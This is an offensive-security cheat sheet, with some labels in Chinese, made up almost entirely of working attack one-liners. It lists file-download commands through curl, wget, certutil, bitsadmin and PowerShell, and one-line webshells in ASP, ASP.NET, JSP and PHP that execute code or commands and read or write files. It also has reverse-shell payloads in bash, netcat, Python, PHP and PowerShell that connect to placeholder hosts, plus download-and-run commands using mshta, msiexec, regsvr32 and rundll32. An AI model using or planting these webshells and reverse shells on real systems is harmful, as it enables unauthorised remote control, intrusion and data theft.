Http
php -S 0.0.0.0:8000
python2 -m SimpleHTTPServer
python3 -m http.server 8000Shell
Curl
curl http://example.com/File -o FileShell
Wget
wget http://example.com/File -O FileShell
Certutil
echo Base64 > Temp && certutil -f -decode Temp File
certutil -urlcache -split -f http://example.com/File File
certutil -urlcache -split -f http://example.com/File deleteShell
Bitsadmin
bitsadmin /transfer job http://example.com/File C:\Users\Public\FileShell
PowerShell
powershell (New-Object System.Net.WebClient).DownloadFile('http://example.com/File','File')
powershell [IO.File]::WriteAllBytes('C:\Users\Public\File',[Convert]::FromBase64String('Base64'))PowerShell
WebShell
ASP
- 代码执行
<% Eval request("code") %>
<% Execute request("code") %>
<% ExecuteGlobal(request("code")) %>ASPNet
- 命令执行
<%= Server.CreateObject("WScript.Shell").exec("cmd.exe /c "&request("cmd")).stdout.readall %>
<%= Server.CreateObject("Shell.Application").ShellExecute("cmd.exe","/c "&request("cmd"),"","open",0) %>ASPNet
- 文件操作
<%= Server.CreateObject("Scripting.FileSystemObject").OpenTextFile(Server.MapPath(request("file")),1,False).Readall %>
<%= Server.CreateObject("Scripting.FileSystemObject").OpenTextFile(Server.MapPath(request("file")),2,True).WriteLine(request("data")) %>ASPNet
JSP
- 代码执行
<% new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("code")); %>
<% new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("url"))}).loadClass(request.getParameter("class")).newInstance(); %>Java
- 命令执行
<% Runtime.getRuntime().exec(new String[]{"bash","-c",request.getParameter("cmd")}); %>
<% new ProcessBuilder(new String[]{"bash","-c",request.getParameter("cmd")}).start(); %>Java
- 文件操作
<% for(java.io.File name:new java.io.File(request.getParameter("dir")).listFiles()){out.println(name+"<br>");} %>
<%@ page import="java.io.FileInputStream" %><% FileInputStream File=new FileInputStream(application.getRealPath("/")+request.getParameter("file"));int Temp=0;while((Temp=File.read())!=-1){out.print((char)Temp);}File.close(); %>
<%@ page import="java.io.FileOutputStream" %><% FileOutputStream File=new FileOutputStream(application.getRealPath("/")+request.getParameter("file"));File.write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("data")));File.close(); %>Java
PHP
- 代码执行
<?php @eval($_REQUEST['code']); ?>
<?php @assert($_REQUEST['code']); ?>
<?php $main=@create_function('',$_REQUEST['code']);$main(); ?>
<?php @call_user_func($_REQUEST['func'],$_REQUEST['code']); ?>
<?php @array_map($_REQUEST['func'],array($_REQUEST['code'])); ?>PHP
- 命令执行
<?php @system($_REQUEST['cmd']); ?>
<?php @passthru($_REQUEST['cmd']); ?>
<?php echo @exec($_REQUEST['cmd']); ?>
<?php echo @shell_exec($_REQUEST['cmd']); ?>
<?php @pcntl_exec('/bin/bash',array('-c',$_REQUEST['cmd'])); ?>
<?php $x=@popen($_REQUEST['cmd'], "r");echo stream_get_contents($x);pclose($x); ?>
<?php $x=@proc_open($_REQUEST['cmd'],array(1=>array("pipe","w")),$y);echo stream_get_contents($y[1]);proc_close($x); ?>PHP
- 文件操作
<?php echo @file_get_contents($_REQUEST['file']); ?>
<?php echo @implode('<br>',scandir($_REQUEST['dir'])); ?>
<?php @file_put_contents($_REQUEST['file'],base64_decode($_REQUEST['data'])); ?>PHP
反弹Shell
TTY
python -c 'import pty; pty.spawn("/bin/bash")'Shell
PHP
php -r '$sock=fsockopen("x.x.x.x",yyyy);exec("/bin/bash -i <&3 >&3 2>&3");'Shell
Bash
bash -i >& /dev/tcp/x.x.x.x/yyyy 0>&1Shell
Ncat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc x.x.x.x yyyy >/tmp/fShell
Mshta
mshta http://example.com/shell.htaShell
Python
python -c 'import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",yyyy));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);'Shell
Msiexec
msiexec /q /i http://example.com/shell.msiShell
Regsvr32
regsvr32 /s /n /u /i:http://example.com/shell.sct scrobj.dllShell
Rundll32
rundll32 javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("shell");window.close();Shell
PowerShell
powershell -nop -w hidden -c "IEX((New-Object Net.WebClient).DownloadString('http://example.com/shell'))"
powershell -nop -c "$TCP=New-Object System.Net.Sockets.TCPClient('x.x.x.x',yyyy);$CMD=$TCP.GetStream();[byte[]]$Bytes = 0..65535|%{0};while(($I=$CMD.Read($Bytes,0,$Bytes.Length)) -ne 0){$Send=[Text.Encoding]::ASCII.GetBytes((iex(New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes,0,$I) 2>&1 | Out-String)+'PS '+(pwd).Path+'> ');$CMD.Write($Send,0,$Send.Length);$CMD.Flush()};$TCP.Close()"PowerShell